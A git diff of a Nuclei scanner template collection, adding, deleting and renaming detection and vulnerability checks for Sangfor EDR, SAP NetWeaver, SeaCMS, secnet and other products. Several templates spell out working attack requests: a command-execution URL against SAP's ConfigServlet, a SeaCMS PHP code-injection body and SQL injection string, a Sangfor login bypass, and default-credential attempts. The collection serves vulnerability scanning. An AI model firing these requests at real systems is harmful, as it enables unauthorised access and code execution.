using a provided username rather than going through the login screen without providing a username. - tags: sangfor,auth-bypass,login - -requests: - - method: GET - path: - - "{{BaseURL}}/ui/login.php?user=admin" - matchers-condition: and - matchers: - - type: status - status: - - 302 - - type: word - words: - - "/download/edr_installer_" - part: body - - type: word - words: - - 'Set-Cookie=""' - part: header - negative: true - - type: word - words: - - 'Set-Cookie=' - part: header diff --git a/nuclei-templates/Other/sangfor-edr-auth-bypass.yaml b/nuclei-templates/Other/sangfor-edr-auth-bypass.yaml new file mode 100644 index 0000000000..703d52dce3 --- /dev/null +++ b/nuclei-templates/Other/sangfor-edr-auth-bypass.yaml @@ -0,0 +1,29 @@ +id: sangfor-edr-auth-bypass +info: + name: Sangfor EDR Authentication Bypass + author: princechaddha + severity: high + description: A vulnerability in Sangfor EDR allows remote attackers to access the system with 'admin' privileges by accessing the login page directly using a provided username rather than going through the login screen without providing a username. + tags: sangfor,auth-bypass,login +requests: + - method: GET + path: + - "{{BaseURL}}/ui/login.php?user=admin" + matchers-condition: and + matchers: + - type: status + status: + - 302 + - type: word + words: + - "/download/edr_installer_" + part: body + - type: word + words: + - 'Set-Cookie=""' + part: header + negative: true + - type: word + words: + - 'Set-Cookie=' + part: header diff --git a/nuclei-templates/Other/sangfor-edr-rce-10029.yaml b/nuclei-templates/Other/sangfor-edr-rce-10029.yaml index ce34560938..1952c84b15 100644 --- a/nuclei-templates/Other/sangfor-edr-rce-10029.yaml +++ b/nuclei-templates/Other/sangfor-edr-rce-10029.yaml @@ -1,10 +1,17 @@ id: sangfor-edr-rce info: - name: Sangfor EDR 3.2.17R1/3.2.21 RCE + name: Sangfor EDR 3.2.17R1/3.2.21 - Remote Code Execution author: pikpikcu severity: critical - description: A vulnerability in Sangfor EDR product allows remote unauthenticated users to cause the product to execute arbitrary commands. - reference: https://www.cnblogs.com/0day-li/p/13650452.html + description: Sangfor EDR 3.2.17R1/3.2.21 allows remote unauthenticated users to to execute arbitrary commands. + reference: + - https://www.cnblogs.com/0day-li/p/13650452.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + metadata: + fofa-query: app="sangfor" tags: rce,sangfor requests: - method: POST @@ -17,9 +24,11 @@ requests: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: - 200 + +# Enhanced by mp on 2022/05/31 diff --git a/nuclei-templates/Other/sap-hana-xsengine-panel-10037.yaml b/nuclei-templates/Other/sap-hana-xsengine-panel-10037.yaml new file mode 100644 index 0000000000..326a240c63 --- /dev/null +++ b/nuclei-templates/Other/sap-hana-xsengine-panel-10037.yaml @@ -0,0 +1,16 @@ +id: sap-hana-xsengine-panel +info: + name: SAP HANA XSEngine Admin Panel + author: PR3R00T + severity: info + tags: panel +requests: + - method: GET + path: + - "{{BaseURL}}/sap/hana/xs/formLogin/login.html" + redirects: true + matchers: + - type: word + words: + - "/sap/hana/xs/formLogin/images/sap.png" + part: body diff --git a/nuclei-templates/Other/sap-hana-xsengine-panel.yaml b/nuclei-templates/Other/sap-hana-xsengine-panel.yaml deleted file mode 100644 index 11aec1ad6b..0000000000 --- a/nuclei-templates/Other/sap-hana-xsengine-panel.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: sap-hana-xsengine-panel -info: - name: SAP HANA XSEngine Admin Panel - author: PR3R00T - severity: info - tags: panel,sap -requests: - - method: GET - path: - - "{{BaseURL}}/sap/hana/xs/formLogin/login.html" - redirects: true - matchers: - - type: word - words: - - "/sap/hana/xs/formLogin/images/sap.png" - part: body diff --git a/nuclei-templates/Other/sap-igs-detect-10041.yaml b/nuclei-templates/Other/sap-igs-detect.yaml similarity index 100% rename from nuclei-templates/Other/sap-igs-detect-10041.yaml rename to nuclei-templates/Other/sap-igs-detect.yaml diff --git a/nuclei-templates/Other/sap-netweaver-detect-10042.yaml b/nuclei-templates/Other/sap-netweaver-detect-10042.yaml index edbd2eaef5..191a7dbbb5 100644 --- a/nuclei-templates/Other/sap-netweaver-detect-10042.yaml +++ b/nuclei-templates/Other/sap-netweaver-detect-10042.yaml @@ -2,8 +2,8 @@ id: sap-netweaver-detect info: name: SAP NetWeaver ICM Detection author: randomstr1ng - severity: info description: Detection of SAP NetWeaver ABAP Webserver (ICM/ICF) + severity: info tags: sap,webserver requests: - method: GET diff --git a/nuclei-templates/Other/sap-netweaver-info-leak-10051.yaml b/nuclei-templates/Other/sap-netweaver-info-leak.yaml similarity index 100% rename from nuclei-templates/Other/sap-netweaver-info-leak-10051.yaml rename to nuclei-templates/Other/sap-netweaver-info-leak.yaml diff --git a/nuclei-templates/Other/sap-netweaver-portal-10055.yaml b/nuclei-templates/Other/sap-netweaver-portal-10055.yaml index 04967317cd..a2cecfe535 100644 --- a/nuclei-templates/Other/sap-netweaver-portal-10055.yaml +++ b/nuclei-templates/Other/sap-netweaver-portal-10055.yaml @@ -1,10 +1,13 @@ id: sap-netweaver-portal + info: name: SAP NetWeaver Portal author: organiccrap severity: info tags: panel,sap + # SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2& + requests: - method: GET path: diff --git a/nuclei-templates/Other/sap-netweaver-rce.yaml b/nuclei-templates/Other/sap-netweaver-rce.yaml new file mode 100644 index 0000000000..43d399241c --- /dev/null +++ b/nuclei-templates/Other/sap-netweaver-rce.yaml @@ -0,0 +1,22 @@ +id: SAP-NetWeaver-rce + +info: + name: Sap Netweaver命令执行 + author: Str1am + severity: high + tags: NetWeaver,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=echo%2021232f297a57a5a743894a0e4a801fc3" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "21232f297a57a5a743894a0e4a801fc3" + part: body + condition: and diff --git a/nuclei-templates/Other/sap-netweaver-webgui-10059.yaml b/nuclei-templates/Other/sap-netweaver-webgui-10059.yaml new file mode 100644 index 0000000000..c9974f3576 --- /dev/null +++ b/nuclei-templates/Other/sap-netweaver-webgui-10059.yaml @@ -0,0 +1,20 @@ +id: sap-nw-webgui +info: + name: SAP NetWeaver WebGUI Detection + author: randomstr1ng + severity: info + description: Detection of SAP NetWeaver ABAP Webserver WebGUI + tags: sap,webserver +requests: + - method: GET + path: + - "{{BaseURL}}/sap/bc/gui/sap/its/webgui" + redirects: true + max-redirects: 2 + matchers: + - type: word + part: body + words: + - "sap-system-login" + - "Logon" + condition: or diff --git a/nuclei-templates/Other/sap-netweaver-webgui.yaml b/nuclei-templates/Other/sap-netweaver-webgui.yaml deleted file mode 100644 index aa27e83989..0000000000 --- a/nuclei-templates/Other/sap-netweaver-webgui.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: sap-nw-webgui -info: - name: SAP NetWeaver WebGUI Detection - author: randomstr1ng - description: Detection of SAP NetWeaver ABAP Webserver WebGUI - severity: info - tags: sap,webserver -requests: - - method: GET - path: - - "{{BaseURL}}/sap/bc/gui/sap/its/webgui" - redirects: true - max-redirects: 2 - matchers: - - type: word - part: body - words: - - "sap-system-login" - - "Logon" - condition: or diff --git a/nuclei-templates/Other/sap-redirect-10064.yaml b/nuclei-templates/Other/sap-redirect-10064.yaml new file mode 100644 index 0000000000..e970788ccf --- /dev/null +++ b/nuclei-templates/Other/sap-redirect-10064.yaml @@ -0,0 +1,29 @@ +id: sap-redirect + +info: + name: SAP wide open redirect + author: Gal Nagli + severity: medium + description: A vulnerability in SAP's 'logoff' endpoint allows attackers to redirect victims to their URL of choice. + tags: redirect,sap + + +requests: + - method: GET + + path: + - "{{BaseURL}}/sap/public/bc/icf/logoff?redirecturl=https://example.com" + + matchers-condition: and + matchers: + + - type: status + status: + - 302 + + - type: word + words: + - "Location: https://www.example.com" + - "Location: https://example.com" + condition: or + part: header diff --git a/nuclei-templates/Other/sap-redirect-10067.yaml b/nuclei-templates/Other/sap-redirect-10067.yaml deleted file mode 100644 index 906e0b928c..0000000000 --- a/nuclei-templates/Other/sap-redirect-10067.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: sap-redirect - -info: - name: SAP wide open redirect - author: Gal Nagli - severity: medium - description: A vulnerability in SAP's 'logoff' endpoint allows attackers to redirect victims to their URL of choice. - tags: redirect,sap - -requests: - - method: GET - - path: - - "{{BaseURL}}/sap/public/bc/icf/logoff?redirecturl=https://example.com" - - matchers-condition: and - matchers: - - - type: status - status: - - 302 - - - type: word - words: - - "Location: https://www.example.com" - - "Location: https://example.com" - condition: or - part: header diff --git a/nuclei-templates/Other/sap-web-dispatcher-10075.yaml b/nuclei-templates/Other/sap-web-dispatcher-10075.yaml new file mode 100644 index 0000000000..cf5e1ad308 --- /dev/null +++ b/nuclei-templates/Other/sap-web-dispatcher-10075.yaml @@ -0,0 +1,19 @@ +id: sap-web-dispatcher-detection +info: + name: SAP Web Dispatcher detection + author: randomstr1ng + description: Detection of SAP Web Dispatcher service + severity: info + tags: sap,webserver,proxy +requests: + - method: GET + redirects: true + max-redirects: 5 + path: + - "{{BaseURL}}/inormalydonotexist" + matchers-condition: or + matchers: + - type: regex + part: body + regex: + - "SAP Web Dispatcher" diff --git a/nuclei-templates/Other/sap-web-dispatcher-10076.yaml b/nuclei-templates/Other/sap-web-dispatcher-10076.yaml deleted file mode 100644 index df4de75244..0000000000 --- a/nuclei-templates/Other/sap-web-dispatcher-10076.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: sap-web-dispatcher-detection -info: - name: SAP Web Dispatcher detection - author: randomstr1ng - description: Detection of SAP Web Dispatcher service - severity: info - tags: sap,webserver,proxy - -requests: - - method: GET - redirects: true - max-redirects: 2 - - path: - - "{{BaseURL}}/inormalydonotexist" - - matchers: - - type: word - part: body - words: - - "This error page was generated by SAP Web Dispatcher" diff --git a/nuclei-templates/Other/sap-web-dispatcher-admin-portal-10070.yaml b/nuclei-templates/Other/sap-web-dispatcher-admin-portal-10070.yaml new file mode 100644 index 0000000000..ead96639d5 --- /dev/null +++ b/nuclei-templates/Other/sap-web-dispatcher-admin-portal-10070.yaml @@ -0,0 +1,32 @@ +id: sap-web-dispatcher-admin-portal +info: + name: SAP Web Dispatcher admin portal detection + author: randomstr1ng + description: Detection of SAP Web Dispatcher Admin Portal + severity: info + tags: sap,webserver,proxy +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/sap/wdisp/admin/public/default.html" + matchers-condition: and + matchers: + - type: word + part: header + condition: or + words: + - "Basic realm=\"WEB ADMIN\"" + - "SAP NetWeaver Application Server" + - type: status + condition: or + status: + - 401 + - 200 + - type: word + part: body + condition: or + words: + - "SAP Web Dispatcher" + - "Administration" diff --git a/nuclei-templates/Other/sap-web-dispatcher-admin-portal-10072.yaml b/nuclei-templates/Other/sap-web-dispatcher-admin-portal-10072.yaml deleted file mode 100644 index 48af8eb5d7..0000000000 --- a/nuclei-templates/Other/sap-web-dispatcher-admin-portal-10072.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: sap-web-dispatcher-admin-portal -info: - name: SAP Web Dispatcher admin portal detection - author: randomstr1ng - severity: info - description: Detection of SAP Web Dispatcher Admin Portal - tags: sap,webserver,proxy -requests: - - method: GET - redirects: true - max-redirects: 2 - path: - - "{{BaseURL}}/sap/wdisp/admin/public/default.html" - matchers-condition: and - matchers: - - type: word - part: header - condition: or - words: - - "Basic realm=\"WEB ADMIN\"" - - "SAP NetWeaver Application Server" - - type: status - condition: or - status: - - 401 - - 200 - - type: word - part: body - condition: or - words: - - "SAP Web Dispatcher" - - "Administration" diff --git a/nuclei-templates/Other/sapfiori-panel.yaml b/nuclei-templates/Other/sapfiori-panel-10033.yaml similarity index 100% rename from nuclei-templates/Other/sapfiori-panel.yaml rename to nuclei-templates/Other/sapfiori-panel-10033.yaml diff --git a/nuclei-templates/Other/sar2html-rce.yaml b/nuclei-templates/Other/sar2html-rce.yaml index 864fca1dcc..c32fd046bb 100644 --- a/nuclei-templates/Other/sar2html-rce.yaml +++ b/nuclei-templates/Other/sar2html-rce.yaml @@ -1,16 +1,10 @@ id: sar2html-rce info: - name: sar2html 3.2.1 - Remote Command Injection + name: sar2html 3.2.1 - 'plot' Remote Code Execution author: gy741 severity: critical - description: | - SAR2HTML could allow a remote attacker to execute arbitrary commands on the system via a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. - reference: - - https://www.exploit-db.com/exploits/49344 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 + description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. + reference: https://www.exploit-db.com/exploits/49344 tags: sar2html,rce,oast requests: - raw: @@ -23,5 +17,3 @@ requests: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# Enhanced by mp on 2022/05/30 diff --git a/nuclei-templates/Other/sassy-social-share-xss.yaml b/nuclei-templates/Other/sassy-social-share.yaml similarity index 100% rename from nuclei-templates/Other/sassy-social-share-xss.yaml rename to nuclei-templates/Other/sassy-social-share.yaml diff --git a/nuclei-templates/Other/sauter-login-10088.yaml b/nuclei-templates/Other/sauter-login-10088.yaml index 802c9f0611..cb5d984cf1 100644 --- a/nuclei-templates/Other/sauter-login-10088.yaml +++ b/nuclei-templates/Other/sauter-login-10088.yaml @@ -1,24 +1,21 @@ id: sauter-login - info: name: Sauter moduWeb - Login author: DhiyaneshDk severity: info - reference: https://www.exploit-db.com/ghdb/6883 + reference: + - https://www.exploit-db.com/ghdb/6883 tags: panel,sauter - requests: - method: GET path: - "{{BaseURL}}/?locale=en" - matchers-condition: and matchers: - type: word words: - Sauter moduWeb - Login part: body - - type: status status: - 200 diff --git a/nuclei-templates/Other/sceditor-detect-10093.yaml b/nuclei-templates/Other/sceditor-detect-10094.yaml similarity index 100% rename from nuclei-templates/Other/sceditor-detect-10093.yaml rename to nuclei-templates/Other/sceditor-detect-10094.yaml diff --git a/nuclei-templates/Other/seacms-rce-10101.yaml b/nuclei-templates/Other/seacms-rce-10101.yaml new file mode 100644 index 0000000000..f8a23b9ba7 --- /dev/null +++ b/nuclei-templates/Other/seacms-rce-10101.yaml @@ -0,0 +1,24 @@ +id: seacms-rce +info: + name: SeaCMS V6.4.5 RCE + author: pikpikcu + severity: high + description: A vulnerability in SeaCMS allows remote unauthenticated attackers to execute arbitrary PHP code. + reference: https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/ + tags: seacms,rce +requests: + - method: POST + path: + - '{{BaseURL}}/search.php?searchtype=5' + body: "searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}" + matchers-condition: and + matchers: + - type: word + words: + - "phpinfo" + - "PHP Version" + condition: and + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/seacms-rce-10102.yaml b/nuclei-templates/Other/seacms-rce-10102.yaml deleted file mode 100644 index 7f2dbaec18..0000000000 --- a/nuclei-templates/Other/seacms-rce-10102.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: seacms-rce -info: - name: SeaCMS V6.4.5 RCE - author: pikpikcu - severity: high - description: A vulnerability in SeaCMS allows remote unauthenticated attackers to execute arbitrary PHP code. - reference: https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/ - tags: seacms,rce - -requests: - - method: POST - path: - - '{{BaseURL}}/search.php?searchtype=5' - body: "searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}" - - matchers-condition: and - matchers: - - type: word - words: - - "phpinfo" - - "PHP Version" - condition: and - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/seacms-sqli-10103.yaml b/nuclei-templates/Other/seacms-sqli-10103.yaml new file mode 100644 index 0000000000..8320037c24 --- /dev/null +++ b/nuclei-templates/Other/seacms-sqli-10103.yaml @@ -0,0 +1,39 @@ +id: seacms-sqli + +info: + name: SeaCMS 8.7 - SQL Injection + author: ritikchaddha + severity: critical + description: SeaCMS 8.7 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + reference: + - https://www.uedbox.com/post/54561/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cwe-id: CWE-89 + metadata: + max-request: 1 + tags: seacms,sqli +variables: + num: "999999999" + +http: + - method: GET + path: + - "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5({{num}})))),@`%27`" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + + - type: status + status: + - 200 + +# digest: 4a0a004730450221008787275f6a42e0d0a7a6a933e75c169456e51bb9d9042f5249fd4297f94d06bb0220235eb517464b0885eb44dfccc39d7c882c15932f00acf07b8c2abaa91bea0ab3:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/Seagate-media-rce.yaml b/nuclei-templates/Other/seagate-media-rce.yaml similarity index 100% rename from nuclei-templates/Other/Seagate-media-rce.yaml rename to nuclei-templates/Other/seagate-media-rce.yaml diff --git a/nuclei-templates/Other/searches (copy 1).yaml b/nuclei-templates/Other/searches.yaml similarity index 100% rename from nuclei-templates/Other/searches (copy 1).yaml rename to nuclei-templates/Other/searches.yaml diff --git a/nuclei-templates/Other/secmail-detect-10111.yaml b/nuclei-templates/Other/secmail-detect-10111.yaml deleted file mode 100644 index 71b8405b65..0000000000 --- a/nuclei-templates/Other/secmail-detect-10111.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: secmail-detect -info: - name: SecMail - secure email Detect - author: johnk3r - severity: info - reference: https://www.shodan.io/search?query=secmail - tags: secmail,panel -requests: - - method: GET - path: - - "{{BaseURL}}/SecMail/login.jsp" - matchers-condition: and - matchers: - - type: word - words: - - "Path=/SecMail" - part: header - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/secmail-detect.yaml b/nuclei-templates/Other/secmail-detect.yaml new file mode 100644 index 0000000000..45536712b0 --- /dev/null +++ b/nuclei-templates/Other/secmail-detect.yaml @@ -0,0 +1,21 @@ +id: secmail-detect +info: + name: SecMail - secure email Detect + author: johnk3r + severity: info + reference: + - https://www.shodan.io/search?query=secmail + tags: secmail,panel +requests: + - method: GET + path: + - "{{BaseURL}}/SecMail/login.jsp" + matchers-condition: and + matchers: + - type: word + words: + - "Path=/SecMail" + part: header + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/secnet-ac-default-login-10113.yaml b/nuclei-templates/Other/secnet-ac-default-login-10113.yaml deleted file mode 100644 index 78194a944c..0000000000 --- a/nuclei-templates/Other/secnet-ac-default-login-10113.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: secnet-ac-default-password - -info: - name: secnet ac - Default Admin Login - author: ritikchaddha - severity: high - description: secnet ac default admin credentials were successful. - reference: - - https://bbs.secnet.cn/post/t-30 - metadata: - max-request: 1 - tags: default-login,secnet - -http: - - raw: - - | - POST /login.cgi HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - user={{username}}&password={{password}} - - attack: pitchfork - payloads: - username: - - admin - password: - - admin - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "window.open('index.htm" - - - type: word - part: header - words: - - "ac_userid={{username}},ac_passwd=" - - - type: status - status: - - 200 - -# digest: 4b0a004830460221008b0bffdca451d4f7a6e3c778051d52d7d8d9dadd85f59ecdadbf3842cb9e1b84022100c20662b0c8793fdf0f5789f2ff09b6bb14c79f20fbf9e4d065af8a09ee8a8896:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/secnet-ac-default-password.yaml b/nuclei-templates/Other/secnet-ac-default-password.yaml new file mode 100644 index 0000000000..348509e76b --- /dev/null +++ b/nuclei-templates/Other/secnet-ac-default-password.yaml @@ -0,0 +1,36 @@ +id: secnet-ac-default-password +info: + name: secnet-ac-default-password + author: ritikchaddha + severity: high + description: secnet ac default admin credentials were discovered. + reference: + - https://bbs.secnet.cn/post/t-30 + tags: secnet,default-login +requests: + - raw: + - | + POST /login.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&password={{password}} + attack: pitchfork + payloads: + username: + - admin + password: + - admin + matchers-condition: and + matchers: + - type: word + part: body + words: + - "window.open('index.htm" + - type: word + part: header + words: + - "ac_userid={{username}},ac_passwd=" + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/securenvoy-panel-10116.yaml b/nuclei-templates/Other/securenvoy-panel-10116.yaml deleted file mode 100644 index 58eb9417de..0000000000 --- a/nuclei-templates/Other/securenvoy-panel-10116.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: securenvoy-panel -info: - name: SecurEnvoy Admin Login - author: 0xrod - severity: info - tags: panel -requests: - - method: GET - path: - - "{{BaseURL}}/secadmin/" - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/securenvoy-panel.yaml b/nuclei-templates/Other/securenvoy-panel.yaml new file mode 100644 index 0000000000..a8d75ddb16 --- /dev/null +++ b/nuclei-templates/Other/securenvoy-panel.yaml @@ -0,0 +1,19 @@ +id: securenvoy-panel +info: + name: SecurEnvoy Admin Login + author: 0xrod + severity: info + tags: panel,securenvoy +requests: + - method: GET + path: + - "{{BaseURL}}/secadmin/" + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/security-antivirus-firewall.yaml b/nuclei-templates/Other/security-antivirus-firewall.yaml new file mode 100644 index 0000000000..551c644afb --- /dev/null +++ b/nuclei-templates/Other/security-antivirus-firewall.yaml @@ -0,0 +1,59 @@ +id: security-antivirus-firewall + +info: + name: > + Security, Antivirus, Firewall – S.A.F <= 2.3.5 - IP Address Spoofing to Protection Mechanism Bypass + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cd177a43-6059-4125-9408-1090b9a54117?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/security-antivirus-firewall/" + google-query: inurl:"/wp-content/plugins/security-antivirus-firewall/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,security-antivirus-firewall,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/security-antivirus-firewall/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "security-antivirus-firewall" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.5') \ No newline at end of file diff --git a/nuclei-templates/Other/security-txt.yaml b/nuclei-templates/Other/security-txt.yaml deleted file mode 100644 index 02d72a4c40..0000000000 --- a/nuclei-templates/Other/security-txt.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: security-txt - -info: - name: Security.txt File - author: bad5ect0r - severity: info - description: The website defines a security policy. - tags: misc,generic - -requests: - - method: GET - path: - - "{{BaseURL}}/.well-known/security.txt" - - "{{BaseURL}}/security.txt" - redirects: true - max-redirects: 3 - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "Contact:" - condition: and - - type: dsl - dsl: - - "len(body) <= 1024 && len(body) > 0" - condition: and diff --git a/nuclei-templates/Other/security.txt.yaml b/nuclei-templates/Other/security.txt.yaml new file mode 100644 index 0000000000..50f38f1ac1 --- /dev/null +++ b/nuclei-templates/Other/security.txt.yaml @@ -0,0 +1,25 @@ +id: security-txt +info: + name: Security.txt File + author: bad5ect0r + severity: info + description: The website defines a security policy. + tags: misc +requests: + - method: GET + path: + - "{{BaseURL}}/.well-known/security.txt" + - "{{BaseURL}}/security.txt" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Contact:" + condition: and + - type: dsl + dsl: + - "len(body) <= 1024 && len(body) > 0" + condition: and diff --git a/nuclei-templates/Other/securityspy-detect-10121.yaml b/nuclei-templates/Other/securityspy-detect-10121.yaml new file mode 100644 index 0000000000..0714a78766 --- /dev/null +++ b/nuclei-templates/Other/securityspy-detect-10121.yaml @@ -0,0 +1,21 @@ +id: securityspy-detect +info: + name: SecuritySpy Camera Detect + author: pussycat0x + severity: medium + metadata: + shodan-dork: 'title:SecuritySpy' + tags: unauth,iot,securityspy,panel,camera +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - 'SecuritySpy' + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/securityspy-detect.yaml b/nuclei-templates/Other/securityspy-detect.yaml deleted file mode 100644 index 76a69cbbc1..0000000000 --- a/nuclei-templates/Other/securityspy-detect.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: securityspy-detect - -info: - name: SecuritySpy Camera Detect - author: pussycat0x - severity: medium - metadata: - shodan-dork: 'title:SecuritySpy' - tags: unauth,iot,securityspy,panel,camera - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - 'SecuritySpy' - part: body - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/selenium-exposure-10137.yaml b/nuclei-templates/Other/selenium-exposure-10138.yaml similarity index 100% rename from nuclei-templates/Other/selenium-exposure-10137.yaml rename to nuclei-templates/Other/selenium-exposure-10138.yaml diff --git a/nuclei-templates/Other/sendgrid-api-key-10140.yaml b/nuclei-templates/Other/sendgrid-api-key-10140.yaml index cb06fc3ffc..76506d7b27 100644 --- a/nuclei-templates/Other/sendgrid-api-key-10140.yaml +++ b/nuclei-templates/Other/sendgrid-api-key-10140.yaml @@ -1,11 +1,9 @@ id: sendgrid-api-key - info: name: Sendgrid API Key Disclosure author: Ice3man severity: info tags: exposure,token,sendgrid - requests: - method: GET path: diff --git a/nuclei-templates/Other/sendgrid-api.yaml b/nuclei-templates/Other/sendgrid-api.yaml deleted file mode 100644 index a67fb048a4..0000000000 --- a/nuclei-templates/Other/sendgrid-api.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: sendgrid-api-key-file -info: - name: Sendgrid API Key - author: gaurang - severity: high - tags: token,file,sendgrid -file: - - extensions: - - all - extractors: - - type: regex - regex: - - "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}" diff --git a/nuclei-templates/Other/sensitive-storage-exposure-10143.yaml b/nuclei-templates/Other/sensitive-storage-exposure-10143.yaml deleted file mode 100644 index 99e0b57b40..0000000000 --- a/nuclei-templates/Other/sensitive-storage-exposure-10143.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: sensitive-storage-data-expose -info: - name: Sensitive Storage Data Exposed - author: pussycat0x - severity: medium - description: Searches for sensitive keys file,logs,debugbar,app. - reference: - - https://www.exploit-db.com/ghdb/6304 - tags: expose,listing,config,logs,storage -requests: - - method: GET - path: - - "{{BaseURL}}/storage/" - - "{{BaseURL}}/api_smartapp/storage/" - - "{{BaseURL}}/equipbid/storage/" - - "{{BaseURL}}/server/storage/" - - "{{BaseURL}}/intikal/storage/" - - "{{BaseURL}}/elocker_old/storage/" - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "oauth-private.key" - - "oauth-private.key" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/sensitive-storage-exposure.yaml b/nuclei-templates/Other/sensitive-storage-exposure.yaml new file mode 100644 index 0000000000..0b841cf60b --- /dev/null +++ b/nuclei-templates/Other/sensitive-storage-exposure.yaml @@ -0,0 +1,29 @@ +id: sensitive-storage-data-expose +info: + name: Sensitive Storage Data Exposed + author: pussycat0x + severity: medium + description: Searches for sensitive keys file,logs,debugbar,app. + reference: https://www.exploit-db.com/ghdb/6304 + tags: expose,listing,config,logs,storage +requests: + - method: GET + path: + - "{{BaseURL}}/storage/" + - "{{BaseURL}}/api_smartapp/storage/" + - "{{BaseURL}}/equipbid/storage/" + - "{{BaseURL}}/server/storage/" + - "{{BaseURL}}/intikal/storage/" + - "{{BaseURL}}/elocker_old/storage/" + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "oauth-private.key" + - "oauth-private.key" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/seowon-router-rce-10149.yaml b/nuclei-templates/Other/seowon-router-rce-10145.yaml similarity index 100% rename from nuclei-templates/Other/seowon-router-rce-10149.yaml rename to nuclei-templates/Other/seowon-router-rce-10145.yaml diff --git a/nuclei-templates/Other/server-backup-login-10153.yaml b/nuclei-templates/Other/server-backup-login-10153.yaml new file mode 100644 index 0000000000..35a3e131d5 --- /dev/null +++ b/nuclei-templates/Other/server-backup-login-10153.yaml @@ -0,0 +1,19 @@ +id: server-backup-login +info: + name: Server Backup Manager SE Login + author: dhiyaneshDKi,pathtaga + severity: info + reference: https://www.exploit-db.com/ghdb/6949 + tags: paneil,idera +requests: + - method: GET + path: + - '{{BaseURL}}/login.zul' + matchers-condition: and + matchers: + - type: word + words: + - 'Idera Server Backup Manager SE ' + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/server-backup-login-10156.yaml b/nuclei-templates/Other/server-backup-login-10156.yaml deleted 